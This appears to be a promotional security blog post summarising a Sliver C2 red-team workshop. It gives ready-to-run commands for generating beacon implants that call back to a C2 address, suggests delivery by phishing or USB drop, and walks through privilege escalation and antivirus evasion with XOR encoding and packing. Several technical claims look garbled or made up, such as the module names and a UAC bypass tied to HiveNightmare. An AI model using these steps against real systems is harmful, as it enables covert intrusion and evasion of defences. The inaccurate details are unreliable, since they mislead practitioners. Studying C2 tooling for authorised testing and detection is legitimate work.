Sliver C2 Unleashed: Master Red Team Ops With This Hands-On Workshop (Free Lab & Recording) + Video

Introduction:

Command and Control (C2) frameworks are the backbone of any red team operation, enabling stealthy communication, persistence, and post-exploitation actions. Sliver C2 has emerged as a powerful, open-source alternative to commercial tools like Cobalt Strike, offering cross-platform implants, advanced evasion, and a modular architecture. In a recent hands-on workshop at Red Team Village (just before DEF CON), Maor Tal from PwC Israel delivered a practical introduction to Sliver C2 v1.7.3, covering beacon deployment, privilege escalation, and basic static detection evasion—all within a deployable lab environment.

Learning Objectives:

Understand the core architecture of Sliver C2 and how it differs from legacy frameworks.
Deploy Sliver beacons and execute post-exploitation tasks on Windows/Linux targets.
Apply privilege escalation techniques and evade static antivirus detection in a controlled lab.

You Should Know

Setting Up Your Sliver C2 Server (Linux & Windows)

Sliver C2 is written in Go and runs on Linux, macOS, and Windows. The workshop lab uses the latest version (1.7.3). Below is a verified setup guide for a Linux C2 server (Ubuntu 22.04) and a Windows client for generating payloads.

Step‑by‑step – Linux Server:

1. Install dependencies:

sudo apt update && sudo apt install -y git make gcc mingw-w64

2. Download Sliver binary (precompiled) or build from source:

curl https://github.com/BishopFox/sliver/releases/download/v1.7.3/sliver-server_1.7.3_linux_amd64 -o sliver-server
chmod +x sliver-server
sudo mv sliver-server /usr/local/bin/

3. Run the server:

sliver-server

(First launch generates certificates and a self‑signed HTTPS listener.)
4. Access the CLI and generate an implant for Windows:

generate --os windows --arch amd64 --format exe --save /tmp/

Step‑by‑step – Windows Operator:

Download `sliver-client.exe` from the same release page.

Connect to your remote server:

sliver-client.exe connect --server YOUR_SERVER_IP:31337

List active sessions with sessions.

This setup mirrors the workshop’s lab environment, where participants used a pre‑built VM to avoid dependency issues. The full lab solution is available at the workshop materials link.

2. Beacon Deployment vs. Interactive Sessions

Sliver supports two main agent modes: interactive (direct, real‑time shell) and beacon (callback with jitter). Beacons are stealthier for persistent access.

Step‑by‑step – Generating and Deploying a Beacon:

On the Sliver server, generate a beacon payload:
```
generate --beacon --interval 30 --jitter 5 --os windows --arch amd64 --format exe --save /tmp/beacon.exe
```
Explanation: The beacon calls back every 30 seconds (±5 sec jitter).

2. Start a listener for beacon callbacks:

beacons

(This command lists all active beacons once they check in.)
3. Execute the beacon on a target Windows machine (e.g., via phishing, USB drop, or upload).

4. After check‑in, interact with the beacon:

use BEACON_UUID

Then run `shell` or `execute -c “whoami”`.

In the workshop, Maor Tal demonstrated beacon deployment inside an isolated lab, emphasizing how jitter defeats simple frequency‑based detection. For Linux targets, use `–os linux` and generate an ELF or shared library.

3. Privilege Escalation with Sliver’s Built‑in Modules

Once a beacon lands, the next step is elevating privileges. Sliver includes several post‑exploitation modules, including `sherlock` (a wrapper for PowerUp) and `ms17-010` (EternalBlue) scanners.

Step‑by‑step – Privilege Escalation on Windows:

1. From an interactive session or beacon, run:

sherlock

This enumerates common Windows misconfigurations and vulnerable services.

If the target is unpatched for `CVE-2021-36934` (HiveNightmare), run:
```
elevate --technique uac-sdctl
```
Explanation: This uses a scheduled task bypass to spawn a high‑integrity shell.

3. Verify admin rights:

getprivs

Linux Privilege Escalation Example:

Use the `linpeas` loader:

upload /path/to/linpeas.sh /tmp/linpeas.sh
execute -c "chmod +x /tmp/linpeas.sh && bash /tmp/linpeas.sh"

For a known sudo vulnerability (CVE‑2021‑3156), Sliver’s `sudo‑baron-samedit` module can be triggered if the target is vulnerable.

The workshop lab provided a deliberately misconfigured Windows VM to practice these escalations safely. Always obtain written authorization before running these commands on any production system.

4. Basic Static Detection Evasion (AV/EDR Bypass)

Sliver offers multiple evasion techniques, including obfuscation, custom encryptors, and reflective DLL injection. The workshop focused on static evasion – avoiding signature‑based scans.

Step‑by‑step – Evading Static AV:

1. Generate an obfuscated beacon:

generate --beacon --os windows --arch amd64 --format exe --skip-symbols --encoder xor --iterations 3 --save /tmp/evasive.exe

Flags: `–skip-symbols` strips debug info, `–encoder xor` applies XOR obfuscation, `–iterations 3` repeats encoding.
2. Use a custom profile to embed a reverse HTTPS listener:

profiles new --beacon --os windows --format exe --encoder xor --iterations 3 --mtls YOUR_C2_IP --http YOUR_C2_IP win_evasion
generate --profile win_evasion --save /tmp/profiled.exe

3. Test the payload locally with Windows Defender (in a lab VM). If detected, add a packer like `UPX` manually:

upx --brute /tmp/profiled.exe

4. For advanced evasion, Sliver supports third‑party `garble` obfuscation at compile time (requires Go source build).

Maor Tal noted that static evasion is only the first layer – modern EDRs require behavioral and memory bypasses. The workshop materials include a full lab with `yamldefender` rules to simulate detection.

5. Deploying the Workshop Lab Environment

The Red Team Village workshop provided a “one‑command” lab deployment using Docker and Vagrant. You can replicate it with the links below.

Step‑by‑step – Launch the Lab:

Clone the workshop repository (URL from the recording):
```
git clone https://github.com/maortal/sliver-workshop-rtv  example – actual link in materials
cd sliver-workshop-rtv
```
Note: The official materials are available at https://lnkd.in/dPKMuRuH (LinkedIn redirect).

2. Install Vagrant and VirtualBox, then run:

vagrant up

This spawns a Windows 10 target VM with vulnerable services and a Kali attacker VM pre‑configured with Sliver 1.7.3.

3. Access the attacker VM: `vagrant ssh attacker`

4. Start Sliver server inside the VM:

sudo sliver-server

5. Follow the workshop recording (linked in the same post) to replicate beacon deployment and privilege escalation.

The lab is self‑contained and safe – network isolation prevents accidental leakage. The full solution guide (including flags for each exercise) is included in the materials.

6. Additional Commands and Resources

| Task | Linux Command (Sliver CLI) | Windows Equivalent |

||-|–|

| List sessions | `sessions` | same |

Windows native commands (run inside `shell`):

– `tasklist /svc` – list running services.
– `wmic qfe list brief` – list installed patches.
– `net user /domain` – enumerate domain users (if joined).

For a deep dive, watch the workshop recording (available at the Red Team Village event page: https://ow.ly/3J3s50YyroU – click “Notify Me” to access the replay).

What Undercode Say

Key Takeaway 1: Sliver C2 is a production‑ready, open‑source framework that rivals commercial C2s. Its beacon architecture and modular implants give red teams exceptional flexibility without licensing costs.
Key Takeaway 2: Static evasion alone is insufficient; the workshop rightly emphasizes layering obfuscation (encoders, custom profiles) with behavioral mimicry. However, modern EDRs demand in‑memory evasion (e.g., patching AMSI) – a topic for the next workshop.

Analysis: The shift towards Sliver reflects a broader industry trend: red teams are abandoning single‑vendor lock‑in for customizable, community‑driven tooling. Maor Tal’s workshop is a perfect entry point for junior red teamers, but note that the lab environment deliberately avoids network‑level detection (e.g., Zeek rules, DNS tunneling analysis). Practitioners should extend the lab by adding their own logging and bypasses. The provided materials (linked above) include a full solution, making self‑study viable for anyone with basic virtualization skills.

Prediction

Within 18 months, Sliver C2 will become the default training tool for red team courses, surpassing Metasploit in popularity for hands‑on exercises. As organizations adopt AI‑driven EDRs, Sliver’s open‑source nature will fuel rapid development of adversarial ML bypasses – but also lead to widespread signature‑based detection of default profiles. Expect to see community “hardened” profiles and third‑party packers become essential. The upcoming RTVCron episode (March 27) and the recorded workshop will accelerate this adoption, especially among blue teams seeking to understand C2 traffic. However, defenders will also leverage Sliver to build realistic detection test cases – a win for the entire cybersecurity ecosystem.

▶️ Related Video (78% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Maor Tal – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky

Listen to this Post